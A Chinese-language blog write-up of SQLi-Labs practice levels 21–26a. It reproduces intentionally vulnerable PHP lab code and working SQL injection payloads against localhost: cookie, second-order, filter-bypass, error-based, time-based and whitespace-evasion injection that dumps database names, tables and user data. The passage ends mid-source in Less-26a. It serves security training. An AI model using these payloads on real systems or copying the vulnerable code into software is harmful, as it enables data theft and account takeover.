antelope_
antelope_

SQLi-Labs 学习笔记(Less 21-30)

点击打开链接

Less-21 基于错误的复杂的字符型Cookie注入


先打开网页查看 Welcome Dhakkan

SQLi-Labs 学习笔记(Less 21-30)_第1张图片


②查看源代码:

[plain]  view plain  copy
  1.   
  2.   
  3.   
  4.   
  5.   
  6. Less-21 Cookie Injection- Error Based- complex - string  
  7.   
  8.   
  9.   
  11. //including the Mysql connect parameters.  
  12.     include("../sql-connections/sql-connect.php");  
  13. if(!isset($_COOKIE['uname']))  
  14.     {  
  15.     //including the Mysql connect parameters.  
  16.     include("../sql-connections/sql-connect.php");  
  17.   
  18.     echo " Welcome    Dhakkan 
";  
  •     echo "";  
  •     echo "";  
  •    
  •   
  •     echo "";  
  •     echo '';  
  •   
  •     echo ' Username :    ';  
  •     echo '     
    • ';  
  •     
  •     echo ' 
     Password :      ';  
  •     echo '   

    • ';   
  •     echo '   
    • ';  
  •   
  •     echo '';  
  •     echo '
    • ';  
  •     echo '
    • ';  
  •     echo '';  
  •     echo '';  
  •     echo '



    ';  
  •     echo '';  
  •     echo '';  
  •   
  •   
  •   
  •   
  •   
  •       
  • function check_input($value)  
  •     {  
  •     if(!empty($value))  
  •         {  
  •         $value = substr($value,0,20); // truncation (see comments)  
  •         }  
  •         if (get_magic_quotes_gpc())  // Stripslashes if magic quotes enabled  
  •             {  
  •             $value = stripslashes($value);  
  •             }  
  •         if (!ctype_digit($value))       // Quote if not a number  
  •             {  
  •             $value = "'" . mysql_real_escape_string($value) . "'";  
  •             }  
  •     else  
  •         {  
  •         $value = intval($value);  
  •         }  
  •     return $value;  
  •     }  
  •   
  •   
  •       
  •     echo "
    ";  
  •     echo "
    ";  
  •       
  •     if(isset($_POST['uname']) && isset($_POST['passwd']))  
  •         {  
  •       
  •         $uname = check_input($_POST['uname']);  
  •         $passwd = check_input($_POST['passwd']);  
  •           
  •       
  •   
  •           
  •         $sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";  
  •         $result1 = mysql_query($sql);  
  •         $row1 = mysql_fetch_array($result1);  
  •             if($row1)  
  •                 {  
  •                 echo '';  
  •                 setcookie('uname', base64_encode($row1['username']), time()+3600);    
  •                   
  •                 echo "I LOVE YOU COOKIES";  
  •                 echo "";  
  •                 echo '';              
  •                 //echo 'Your Cookie is: ' .$cookee;  
  •                 echo "";  
  •                 echo "
    ";  
  •                 print_r(mysql_error());           
  •                 echo "

    ";  
  •                 echo '';  
  •                 echo "
    ";  
  •                 header ('Location: index.php');  
  •                 }  
  •             else  
  •                 {  
  •                 echo '';  
  •                 //echo "Try again looser";  
  •                 print_r(mysql_error());  
  •                 echo "
    ";           
  •                 echo "
    ";  
  •                 echo '';    
  •                 echo "";    
  •                 }  
  •             }  
  •           
  •             echo "";    
  •     echo '';  
  •     echo '
    • ';  
  •   
  • }  
  • else  
  • {  
  •   
  •   
  •   
  •     if(!isset($_POST['submit']))  
  •         {  
  •             $cookee = $_COOKIE['uname'];  
  •             $format = 'D d M Y - H:i:s';  
  •             $timestamp = time() + 3600;  
  •             echo "
    ";  
  •             echo "


    ";  
  •             echo '';  
  •             echo "

    ";  
  •             echo '
    ';     
  •             echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];  
  •             echo "
    ";   
  •             echo '';      
  •             echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];             
  •             echo "
    ";           
  •             echo '';  
  •             echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE 
    ";  
  •             echo '';           
  •             echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);  
  •               
  •             $cookee = base64_decode($cookee);  
  •             echo "
    ";  
  •             $sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";  
  •             $result=mysql_query($sql);  
  •             if (!$result)  
  •                 {  
  •                 die('Issue with your mysql: ' . mysql_error());  
  •                 }  
  •             $row = mysql_fetch_array($result);  
  •             if($row)  
  •                 {  
  •                 echo '';      
  •                 echo 'Your Login name:'. $row['username'];  
  •                 echo "
    ";  
  •                 echo '';      
  •                 echo 'Your Password:' .$row['password'];  
  •                 echo "";  
  •                 echo "
    ";  
  •                 echo 'Your ID:' .$row['id'];  
  •                 }  
  •             else      
  •                 {  
  •                 echo "
    ";  
  •                 echo '


    ';  
  •                 echo '';  
  •                 echo "

    ";  
  •                 //echo '';  
  •                 }  
  •             echo '
    ';  
  •             echo '';  
  •             echo '';  
  •             echo '';  
  •             echo '';  
  •         }     
  •     else  
  •         {  
  •         echo '
    ';  
  •         echo "
    ";  
  •         echo "
    ";  
  •         echo "
    ";  
  •         echo "
    ";  
  •         echo "
    ";  
  •         echo "
    ";  
  •         echo '';  
  •         echo " Your Cookie is deleted";  
  •                 setcookie('uname', base64_encode($row1['username']), time()-3600);  
  •                 header ('Location: index.php');  
  •         echo '
    ';  
  •           
  •         }         
  •   
  •   
  •             echo "
    ";  
  •             echo "
    ";  
  •             //header ('Location: main.php');  
  •             echo "
    ";  
  •             echo "
    ";  
  •               
  •             //echo '';  
  •             //logging the connection parameters to a file for analysis.   
  •         $fp=fopen('result.txt','a');  
  •         fwrite($fp,'Cookie:'.$cookee."\n");  
  •       
  •         fclose($fp);  
  •       
  • }  
  • ?>  
  •   
  •   
  •   

    • 分析代码可以看到这里采用了 base64编码

    [plain]  view plain  copy
    1. $cookee = base64_decode($cookee);  
    2. echo "
      ";  
    3. $sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";  

    那我们只要把注入的语句改成base64就可以了

    SQLi-Labs 学习笔记(Less 21-30)_第2张图片


    Less-22 基于错误的双引号字符型Cookie注入


    先打开网页查看 Welcome Dhakkan

    SQLi-Labs 学习笔记(Less 21-30)_第3张图片


    ②查看源代码:

    [plain]  view plain  copy
    1.   
    2.   
    3.   
    4.   
    5.   
    6. Less-22 Cookie Injection- Error Based- Double Quotes - string  
    7.   
    8.   
    9.   
    11. //including the Mysql connect parameters.  
    12.     include("../sql-connections/sql-connect.php");  
    13. if(!isset($_COOKIE['uname']))  
    14.     {  
    15.     //including the Mysql connect parameters.  
    16.     include("../sql-connections/sql-connect.php");  
    17.   
    18.     echo " Welcome    Dhakkan 
    ";  
  •     echo "";  
  •     echo "";  
  •    
  •   
  •     echo "";  
  •     echo '';  
  •   
  •     echo ' Username :    ';  
  •     echo '     
    • ';  
  •     
  •     echo ' 
     Password :      ';  
  •     echo '   

    • ';   
  •     echo '   ';  
  •   
  •     echo '';  
  •     echo '';  
  •     echo '';  
  •     echo '';  
  •     echo '';  
  •     echo '



    ';  
  •     echo '';  
  •     echo '';  
  •   
  •   
  •   
  •   
  •   
  •   
  •       
  • function check_input($value)  
  •     {  
  •     if(!empty($value))  
  •         {  
  •         $value = substr($value,0,20); // truncation (see comments)  
  •         }  
  •         if (get_magic_quotes_gpc())  // Stripslashes if magic quotes enabled  
  •             {  
  •             $value = stripslashes($value);  
  •             }  
  •         if (!ctype_digit($value))       // Quote if not a number  
  •             {  
  •             $value = "'" . mysql_real_escape_string($value) . "'";  
  •             }  
  •     else  
  •         {  
  •         $value = intval($value);  
  •         }  
  •     return $value;  
  •     }  
  •   
  •   
  •       
  •     echo "
    ";  
  •     echo "
    ";  
  •       
  •     if(isset($_POST['uname']) && isset($_POST['passwd']))  
  •         {  
  •       
  •         $uname = check_input($_POST['uname']);  
  •         $passwd = check_input($_POST['passwd']);  
  •           
  •       
  •   
  •           
  •         $sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";  
  •         $result1 = mysql_query($sql);  
  •         $row1 = mysql_fetch_array($result1);  
  •             if($row1)  
  •                 {  
  •                 echo '';  
  •                 setcookie('uname', base64_encode($row1['username']), time()+3600);    
  •                 header ('Location: index.php');  
  •                 echo "I LOVE YOU COOKIES";  
  •                 echo "";  
  •                 echo '';              
  •                 //echo 'Your Cookie is: ' .$cookee;  
  •                 echo "";  
  •                 echo "
    ";  
  •                 print_r(mysql_error());           
  •                 echo "

    ";  
  •                 echo '';  
  •                 echo "
    ";  
  •                 }  
  •             else  
  •                 {  
  •                 echo '';  
  •                 //echo "Try again looser";  
  •                 print_r(mysql_error());  
  •                 echo "
    ";           
  •                 echo "
    ";  
  •                 echo '';    
  •                 echo "";    
  •                 }  
  •             }  
  •           
  •             echo "";    
  •     echo '';  
  •     echo '';  
  •   
  • }  
  • else  
  • {  
  •   
  •   
  •   
  •     if(!isset($_POST['submit']))  
  •         {  
  •             $cookee = $_COOKIE['uname'];  
  •             $format = 'D d M Y - H:i:s';  
  •             $timestamp = time() + 3600;  
  •             echo "
    ";  
  •             echo "


    ";  
  •             echo '';  
  •             echo "

    ";  
  •             echo '
    ';     
  •             echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];  
  •             echo "
    ";   
  •             echo '';      
  •             echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];             
  •             echo "
    ";           
  •             echo '';  
  •             echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE 
    ";  
  •             echo '';           
  •             echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);  
  •               
  •             $cookee = base64_decode($cookee);  
  •             $cookee1 = '"'. $cookee. '"';  
  •             echo "
    ";  
  •             $sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";  
  •             $result=mysql_query($sql);  
  •             if (!$result)  
  •                 {  
  •                 die('Issue with your mysql: ' . mysql_error());  
  •                 }  
  •             $row = mysql_fetch_array($result);  
  •             if($row)  
  •                 {  
  •                 echo '';      
  •                 echo 'Your Login name:'. $row['username'];  
  •                 echo "
    ";  
  •                 echo '';      
  •                 echo 'Your Password:' .$row['password'];  
  •                 echo "";  
  •                 echo "
    ";  
  •                 echo 'Your ID:' .$row['id'];  
  •                 }  
  •             else      
  •                 {  
  •                 echo "
    ";  
  •                 echo '


    ';  
  •                 echo '';  
  •                 echo "

    ";  
  •                 //echo '';  
  •                 }  
  •             echo '
    ';  
  •             echo '';  
  •             echo '';  
  •             echo '';  
  •             echo '';  
  •         }     
  •     else  
  •         {  
  •         echo '
    ';  
  •         echo "
    ";  
  •         echo "
    ";  
  •         echo "
    ";  
  •         echo "
    ";  
  •         echo "
    ";  
  •         echo "
    ";  
  •         echo '';  
  •         echo " Your Cookie is deleted";  
  •                 setcookie('uname', base64_encode($row1['username']), time()-3600);  
  •                 header ('Location: index.php');  
  •         echo '
    ';  
  •           
  •         }         
  •   
  •   
  •             echo "
    ";  
  •             echo "
    ";  
  •             //header ('Location: main.php');  
  •             echo "
    ";  
  •             echo "
    ";  
  •               
  •             //echo '';  
  •             //logging the connection parameters to a file for analysis.   
  •         $fp=fopen('result.txt','a');  
  •         fwrite($fp,'Cookie:'.$cookee."\n");  
  •       
  •         fclose($fp);  
  •       
  • }  
  • ?>  
  •   
  •   
  •   

    • 没什么好说的,这次用的是双引号,那就改双引号喽


    SQLi-Labs 学习笔记(Less 21-30)_第4张图片


    Less-23 基于错误的,过滤注释的GET型


    先打开网页查看 Welcome Dhakkan

    SQLi-Labs 学习笔记(Less 21-30)_第5张图片


    ②查看源代码:

    [plain]  view plain  copy
    1.   
    2.   
    3.   
    4.   
    5. Less-23 **Error Based- no comments**  
    6.   
    7.   
    8.   
    9. Welcome    Dhakkan 
        
    10.   
    11.   
    12.   
    14. //including the Mysql connect parameters.  
    15. include("../sql-connections/sql-connect.php");  
    16.   
    17. // take the variables   
    18. if(isset($_GET['id']))  
    19. {  
    20. $id=$_GET['id'];  
    21.   
    22. //filter the comments out so as to comments should not work  
    23. $reg = "/#/";  
    24. $reg1 = "/--/";  
    25. $replace = "";  
    26. $id = preg_replace($reg, $replace, $id);  
    27. $id = preg_replace($reg1, $replace, $id);  
    28. //logging the connection parameters to a file for analysis.  
    29. $fp=fopen('result.txt','a');  
    30. fwrite($fp,'ID:'.$id."\n");  
    31. fclose($fp);  
    32.   
    33. // connectivity   
    34.   
    35.   
    36. $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";  
    37. $result=mysql_query($sql);  
    38. $row = mysql_fetch_array($result);  
    39.   
    40.     if($row)  
    41.     {  
    42.     echo '';     
    43.     echo 'Your Login name:'. $row['username'];  
    44.     echo "
      ";  
    45.     echo 'Your Password:' .$row['password'];  
    46.     echo "";  
    47.     }  
    48.     else   
    49.     {  
    50.     echo '';  
    51.     print_r(mysql_error());  
    52.     echo "";    
    53.     }  
    54. }  
    55.     else { echo "Please input the ID as parameter with numeric value";}  
    56.   
    57. ?>  
    58.  



      
    •   
  •   
  •   

    • 既然是过滤字符,那就来判断一下它都过滤了哪些字符,首先判断#号
    SQLi-Labs 学习笔记(Less 21-30)_第6张图片


    很明显#号被过滤了,因为如果没有被过滤那么是不会报错了,报错的原因是因为:

    [plain]  view plain  copy
    1. SELECT * FROM users WHERE id='$id' LIMIT 0,1  

    被替换成了

    [plain]  view plain  copy
    1. SELECT * FROM users WHERE id='1'#' LIMIT 0,1  

    #号被过滤掉的话,就会报错,再来看看 -- 单行注释有没有被过滤

    SQLi-Labs 学习笔记(Less 21-30)_第7张图片


    %20是空格的意思,因为我们要在--后加个空格或其他什么字符,单行注释才有效,那么很明显,也被过滤了。至于为什么说被过滤了,和刚才的判断方法一样。


    总结一下如何判断注释过滤,具体过滤成什么就要看报错信息

    #:直接加 单引号,双引号等,后面再加个#

    --:直接加 单引号,双引号等,后面再加个--,后面不用空格(因为--注释有效的时候,后面要有空格或其他字符才行,这里判断过滤就不用了)


    既然被过滤了,那我们只好闭合绕过

    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-23/?id=1' or '1'='1  

    SQLi-Labs 学习笔记(Less 21-30)_第8张图片


    开始构建sql语句:

    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-23/?id=-1' union select 1,database(),'3  
    SQLi-Labs 学习笔记(Less 21-30)_第9张图片


    此处讲解几个知识点:

    1. id=-1,为什么要用-1,因为sql语句执行了两个select语句,第一个select为id的选择语句,第二个为我们构造的select语句。只有一个数据可以输出,为了让我们自己构造的数据可以正常输出,第一个select要没有结果,所以-1或者超过数据库所有数据都可以。
    2. -1' union select 1,database(),'3,第一个'(单引号)闭合-1,第二个'(单引号)闭合后面的。这样将查询内容显示在username处。

    此处可以报错注入,延时注入,可以利用or '1'='1进行闭合。

    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-23/?id=-1' or extractvalue(1,concat(0x7e,database())) or '1'='1  


    获取数据库:

    [plain]  view plain  copy
    1. http://127.0.0.1/sqllib/Less-23/index.php?id=-1'union select 1,(select group_concat(schema_name) from information_schema.schemata),'3   

    查看 security库数据表
    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-23/?id=-1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),'3  


    查看users表的所有列:

    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-23/?id=-1'union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),'3  

    获取内容:
    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-23/?id=-1' union select 1,(select group_concat(username) from security.users limit 0,1),'3  


    Less-24二次注入


    先打开网页查看 Welcome Dhakkan

    SQLi-Labs 学习笔记(Less 21-30)_第10张图片


    这次页面稍微有趣一点了,来看看根目录有哪些文件

    SQLi-Labs 学习笔记(Less 21-30)_第11张图片


    Ps:本关可能会有朋友和我遇到一样的问题,登录成功以后没有修改密码的相关操作。此时造成问题的主要原因是logged-in.php文件不正确。可重新下载解压,解压过程中要主要要覆盖


    本关为二次排序注入的示范例。二次排序注入也称为存储型的注入,就是将可能导致sql注入的字符先存入到数据库中,当再次调用这个恶意构造的字符时,就可以出发sql注入。二次排序注入思路:


    1. 黑客通过构造数据的形式,在浏览器或者其他软件中提交HTTP数据报文请求到服务端进行处理,提交的数据报文请求中可能包含了黑客构造的SQL语句或者命令。

    2. 服务端应用程序会将黑客提交的数据信息进行存储,通常是保存在数据库中,保存的数据信息的主要作用是为应用程序执行其他功能提供原始输入数据并对客户端请求做出响应。

    3. 黑客向服务端发送第二个与第一次不相同的请求数据信息。

    4. 服务端接收到黑客提交的第二个请求信息后,为了处理该请求,服务端会查询数据库中已经存储的数据信息并处理,从而导致黑客在第一次请求中构造的SQL语句或者命令在服务端环境中执行。

    5. 服务端返回执行的处理结果数据信息,黑客可以通过返回的结果数据信息判断二次注入漏洞利用是否成功。


    那么,我们来分析一下代码,首先是login.php(对登录进行处理的文件):

    [plain]  view plain  copy
    1. $username = mysql_real_escape_string($_POST["login_user"]);  
    2. $password = mysql_real_escape_string($_POST["login_password"]);  
    3. $sql = "SELECT * FROM users WHERE username='$username' and password='$password'";  


    很明显的,对用户和密码都过滤了,接下来是login_create.php(对新建用户进行处理的文件):

    [plain]  view plain  copy
    1. $username=  mysql_escape_string($_POST['username']) ;  
    2. $pass= mysql_escape_string($_POST['password']);  
    3. $re_pass= mysql_escape_string($_POST['re_password']);  

    过滤了三个字段,到了pass_change.php我们就有收获了,

    SQLi-Labs 学习笔记(Less 21-30)_第12张图片


    发现更改密码时,直接从SESSION里面获取而没有进行任何的过滤,一旦我的用户名有注释符,那么我就可以随意更改别人的密码了。


    既然思路已经有了,那么就开始吧,首先注册一个admin'#的账号,接下来登录该帐号后进行修改密码。此时修改的就是admin的密码。

    SQLi-Labs 学习笔记(Less 21-30)_第13张图片


    我们先看下admin的密码,此时的密码是1:

    SQLi-Labs 学习笔记(Less 21-30)_第14张图片


    然后我们对 admin'# 修改密码,这期间会执行这样的一条语句:

    [plain]  view plain  copy
    1. UPDATE users SET passwd="New_Pass" WHERE username ='admin'#' AND password='...  

    事实上也就是执行了:

    [plain]  view plain  copy
    1. UPDATE users SET passwd="New_Pass" WHERE username ='admin'  


    那么,来修改下密码,看看admin的密码是否变化了,我将密码改为888888

    SQLi-Labs 学习笔记(Less 21-30)_第15张图片


    来看看数据库的,我们发现admin的密码变成了888888

    SQLi-Labs 学习笔记(Less 21-30)_第16张图片



    Less-25 过滤了or和and


    先打开网页查看 Welcome Dhakkan

    SQLi-Labs 学习笔记(Less 21-30)_第17张图片


    ②查看源代码:

    [plain]  view plain  copy
    1.   
    2.   
    3.   
    4.   
    5. Less-25 Trick with OR & AND  
    6.   
    7.   
    8.   
    9. Welcome    Dhakkan 
        
    10.   
    11.   
    12.   
    14. //including the Mysql connect parameters.  
    15. include("../sql-connections/sql-connect.php");  
    16.   
    17.   
    18. // take the variables   
    19. if(isset($_GET['id']))  
    20. {  
    21.     $id=$_GET['id'];  
    22.     //logging the connection parameters to a file for analysis.  
    23.     $fp=fopen('result.txt','a');  
    24.     fwrite($fp,'ID:'.$id."\n");  
    25.     fclose($fp);  
    26.   
    27.     //fiddling with comments  
    28.     $id= blacklist($id);  
    29.     //echo "
      ";  
    30.     //echo $id;  
    31.     //echo "
      ";  
    32.     $hint=$id;  
    33.   
    34. // connectivity   
    35.     $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";  
    36.     $result=mysql_query($sql);  
    37.     $row = mysql_fetch_array($result);  
    38.     if($row)  
    39.     {  
    40.         echo "";    
    41.         echo 'Your Login name:'. $row['username'];  
    42.         echo "
      ";  
    43.         echo 'Your Password:' .$row['password'];  
    44.         echo "";  
    45.     }  
    46.     else   
    47.     {  
    48.         echo '';  
    49.         print_r(mysql_error());  
    50.         echo "";    
    51.     }  
    52. }  
    53. else   
    54. {   
    55.     echo "Please input the ID as parameter with numeric value";  
    56. }  
    57.   
    58.   
    59. function blacklist($id)  
    60. {  
    61.     $id= preg_replace('/or/i',"", $id);         //strip out OR (non case sensitive)  
    62.     $id= preg_replace('/AND/i',"", $id);        //Strip out AND (non case sensitive)  
    63.       
    64.     return $id;  
    65. }  
    66.   
    67.   
    68.   
    69.   
    70. ?>  
    71.  



      
  •   

  •   

  •   

  •   
  •   

  •   

  •   
  •   
  • echo "Hint: Your Input is Filtered with following result: ".$hint;  
  • ?>  
  •    
    •   
  •   
  •   


    • [plain]  view plain  copy
    1. 首先,通过确认单引号字符注入  
    2. http://localhost/sqli-labs/Less-25/?id=1'    
    3. 判断过滤了or,跟less1对比报错即可推断出来  
    4.   
    5. http://localhost/sqli-labs/Less-25/?id=1' or1   
    6.   
    7. 判断过滤了and   
    8. http://localhost/sqli-labs/Less-25/?id=1' and1    
    9.   
    10. 再分析下源码,开了i模式的匹配,大小写看来是不能饶的  
    11. $id= preg_replace('/or/i',"", $id);   
    12. $id= preg_replace('/AND/i',"", $id);  


    如何绕过or和and过滤。一般性提供以下几种思路:

    1. 大小写变形 Or,OR,oR
    2. 编码,hex,urlencode
    3. 添加注释/*or*/
    4. 利用符号 and=&& or=||
    5. 双写绕过 oorr anandd

    这里我们利用(4)进行注入,

    SQLi-Labs 学习笔记(Less 21-30)_第18张图片


    利用extractvalue,来获取数据库信息

    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-25/?id=1' || extractvalue(1,concat(0x7e,database())) || '1'='1  

    SQLi-Labs 学习笔记(Less 21-30)_第19张图片


    Less-25a 过滤了or和and的盲注


    先打开网页查看 Welcome Dhakkan

    SQLi-Labs 学习笔记(Less 21-30)_第20张图片


    ②查看源代码  :

    [plain]  view plain  copy
    1.   
    2.   
    3.   
    4.   
    5. Less-25a Trick with OR & AND Blind  
    6.   
    7.   
    8.   
    9. Welcome    Dhakkan 
        
    10.   
    11.   
    12.   
    14. //including the Mysql connect parameters.  
    15. include("../sql-connections/sql-connect.php");  
    16.   
    17.   
    18. // take the variables  
    19. if(isset($_GET['id']))  
    20. {  
    21. $id=$_GET['id'];  
    22. //logging the connection parameters to a file for analysis.  
    23. $fp=fopen('result.txt','a');  
    24. fwrite($fp,'ID:'.$id."\n");  
    25. fclose($fp);  
    26.   
    27.     //fiddling with comments  
    28.     $id= blacklist($id);  
    29.     //echo "
      ";  
    30.     //echo $id;  
    31.     //echo "
      ";  
    32.     $hint=$id;  
    33.   
    34. // connectivity   
    35. $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";  
    36. $result=mysql_query($sql);  
    37. $row = mysql_fetch_array($result);  
    38.   
    39.     if($row)  
    40.     {  
    41.         echo "";    
    42.         echo 'Your Login name:'. $row['username'];  
    43.         //echo 'YOU ARE IN ........';         
    44.         echo "
      ";  
    45.         echo 'Your Password:' .$row['password'];  
    46.         echo "";  
    47.     }  
    48.     else   
    49.     {  
    50.         echo '';  
    51.         //echo 'You are in...........';  
    52.         //print_r(mysql_error());  
    53.         //echo "You have an error in your SQL syntax";  
    54.         echo "
      ";      
    55.         echo '';    
    56.       
    57.     }  
    58. }  
    59.     else   
    60. {   
    61.     echo "Please input the ID as parameter with numeric value";  
    62. }  
    63.   
    64. function blacklist($id)  
    65. {  
    66.     $id= preg_replace('/or/i',"", $id);         //strip out OR (non case sensitive)  
    67.     $id= preg_replace('/AND/i',"", $id);        //Strip out AND (non case sensitive)  
    68.       
    69.     return $id;  
    70. }  
    71.   
    72.   
    73.   
    74. ?>  
    75.   
    76.  



      
  •   

  •   

  •   

  •   
  •   

  •   

  •   
  •   
  • echo "Hint: Your Input is Filtered with following result: ".$hint;  
  • ?>  
  •    
    •   
  •   
  •   

    • 那么盲注怎么判断过滤了and跟or呢,直接在前面添加or或and

    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-25a/?id=or1  

    不同于25关的是sql语句中对于id,没有''的包含,同时没有输出错误项,报错注入不能用。其余基本上和25示例没有差别。此处采取两种方式:延时注入和联合注入。

    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-25a/?id=-1 || if(length(database())=8,1,sleep(5))#  

    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-25a/?id=-1 union select 1,database(),3#  


    Less-26 过滤了注释和空格的注入


    先打开网页查看 Welcome Dhakkan

    SQLi-Labs 学习笔记(Less 21-30)_第21张图片


    ②查看源码:

    [plain]  view plain  copy
    1.   
    2.   
    3.   
    4.   
    5. Less-26 Trick with comments  
    6.   
    7.   
    8.   
    9. Welcome    Dhakkan 
        
    10.   
    11.   
    12.   
    14. //including the Mysql connect parameters.  
    15. include("../sql-connections/sql-connect.php");  
    16.   
    17. // take the variables   
    18. if(isset($_GET['id']))  
    19. {  
    20.     $id=$_GET['id'];  
    21.     //logging the connection parameters to a file for analysis.  
    22.     $fp=fopen('result.txt','a');  
    23.     fwrite($fp,'ID:'.$id."\n");  
    24.     fclose($fp);  
    25.   
    26.     //fiddling with comments  
    27.     $id= blacklist($id);  
    28.     //echo "
      ";  
    29.     //echo $id;  
    30.     //echo "
      ";  
    31.     $hint=$id;  
    32.   
    33. // connectivity   
    34.     $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";  
    35.     $result=mysql_query($sql);  
    36.     $row = mysql_fetch_array($result);  
    37.     if($row)  
    38.     {  
    39.         echo "";    
    40.         echo 'Your Login name:'. $row['username'];  
    41.         echo "
      ";  
    42.         echo 'Your Password:' .$row['password'];  
    43.         echo "";  
    44.     }  
    45.     else   
    46.     {  
    47.         echo '';  
    48.         print_r(mysql_error());  
    49.         echo "";    
    50.     }  
    51. }  
    52.     else { echo "Please input the ID as parameter with numeric value";}  
    53.   
    54.   
    55.   
    56.   
    57. function blacklist($id)  
    58. {  
    59.     $id= preg_replace('/or/i',"", $id);         //strip out OR (non case sensitive)  
    60.     $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)  
    61.     $id= preg_replace('/[\/\*]/',"", $id);      //strip out /*  
    62.     $id= preg_replace('/[--]/',"", $id);        //Strip out --  
    63.     $id= preg_replace('/[#]/',"", $id);         //Strip out #  
    64.     $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces  
    65.     $id= preg_replace('/[\/\\\\]/',"", $id);        //Strip out slashes  
    66.     return $id;  
    67. }  
    68.   
    69.   
    70.   
    71. ?>  
    72.  



      
  •   

  •   

  •   

  •   
  •   

  •   

  •   
  •   
  • echo "Hint: Your Input is Filtered with following result: ".$hint;  
  • ?>  
  •    
    •   
  •   
  •   


    • [plain]  view plain  copy
    1. 确认过滤了#    
    2. http://localhost/sqli-labs/Less-26/?id=%231    
    3. 确认过滤了or    
    4. http://localhost/sqli-labs/Less-26/?id=or1    
    5. 确认过滤多行注释符    
    6. http://localhost/sqli-labs/Less-26/?id=/*1    
    7. 确认过滤了单行注释    
    8. http://localhost/sqli-labs/Less-26/?id=--1   
    9. 确认过滤了斜杠    
    10. http://localhost/sqli-labs/Less-26/?id=/1    
    11. 确认过滤了反斜杠    
    12. http://localhost/sqli-labs/Less-26/?id=1\    
    13. 确认过滤了空格    
    14. http://localhost/sqli-labs/Less-26/?id=1' ' '    


    看下源码:

    [plain]  view plain  copy
    1. $id= preg_replace('/or/i',"", $id);  
    2. $id= preg_replace('/and/i',"", $id);  
    3. $id= preg_replace('/[\/\*]/',"", $id);  
    4. $id= preg_replace('/[--]/',"", $id);  
    5. $id= preg_replace('/[#]/',"", $id);  
    6. $id= preg_replace('/[\s]/',"", $id);  
    7. $id= preg_replace('/[\/\\\\]/',"", $id);  


    将空格,or,and,/*,#,--,/等各种符号过滤,此处对于and,or的处理方法不再赘述,参考25.此处我们需要说明两方面:对于注释和结尾字符的我们此处只能利用构造一个 ' 来闭合后面到 ' ;对于空格,有较多的方法:

    %09 TAB键(水平)

    %0a 新建一行

    %0c 新的一页

    %0d return功能

    %0b TAB键(垂直)

    %a0 空格


    注意:本关可能有的朋友在windows下无法使用一些特殊的字符代替空格,此处是因为apache的解析的问题,这里请更换到linux平台下。


    不过还是想到一个不用半个空格就可以获取信息的方法,构建如下语句:

    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-26/?id=-1%27||extractvalue(1,concat(0x7e,database()))||'1'='1  

    SQLi-Labs 学习笔记(Less 21-30)_第22张图片


    遗憾的是只能获取一些少量信息,由于我的平台是windows的,就不给大家演示Linux下的了,直接给出payload:

    [plain]  view plain  copy
    1. 确认字段数    
    2. http://localhost/sqli-labs/Less-26/?id=0%27union%a0select%a01,2,3,4%a0%26%26%a0%271%27=%271    
    3. http://localhost/sqli-labs/Less-26/?id=0%27union%a0select%a01,2,3%a0%26%26%a0%271%27=%271    
    4. 获取当前使用的数据库    
    5. http://localhost/sqli-labs/Less-26/?id=0%27union%a0select%a01,database(),3%a0%26%26%a0%271%27=%271    
    6. 获取表信息    
    7. http://localhost/sqli-labs/Less-26/?id=0%27union%a0select%a01,group_concat(table_name),3%a0from%a0infoorrmation_schema.tables%a0where%a0table_schema='security'%26%26%a0%271%27=%271    
    8. 获取列信息    
    9. http://localhost/sqli-labs/Less-26/?id=0%27union%a0select%a01,group_concat(column_name),3%a0from%a0infoorrmation_schema.columns%a0where%a0table_schema='security'%a0anandd%a0table_name='emails'%26%26%a0%271%27=%271    
    10. 获取数据,  
    11. http://localhost/sqli-labs/Less-26/?id=0%27%a0union%a0select%a01,group_concat(email_id),3%a0from%a0emails%a0union%a0select(1),2,'3   
    12. http://localhost/sqli-labs/Less-26/?id=0%27%a0union%a0select%a01,group_concat(email_id),3%a0from%a0emails%a0where%a0%271%27=%271    

    Less-26a  过滤了空格和注释的盲注


    先打开网页查看 Welcome Dhakkan

    SQLi-Labs 学习笔记(Less 21-30)_第23张图片


    ②查看源代码:

    [plain]  view plain  copy
    1.   
    2.   
    3.   
    4.   
    5. Less-26a Trick with comments  
    6.   
    7.   
    8.   
    9. Welcome    Dhakkan 
        
    10.   
    11.   
    12.   
    14. //including the Mysql connect parameters.  
    15. include("../sql-connections/sql-connect.php");  
    16.   
    17. // take the variables   
    18. if(isset($_GET['id']))  
    19. {  
    20.     $id=$_GET['id'];  
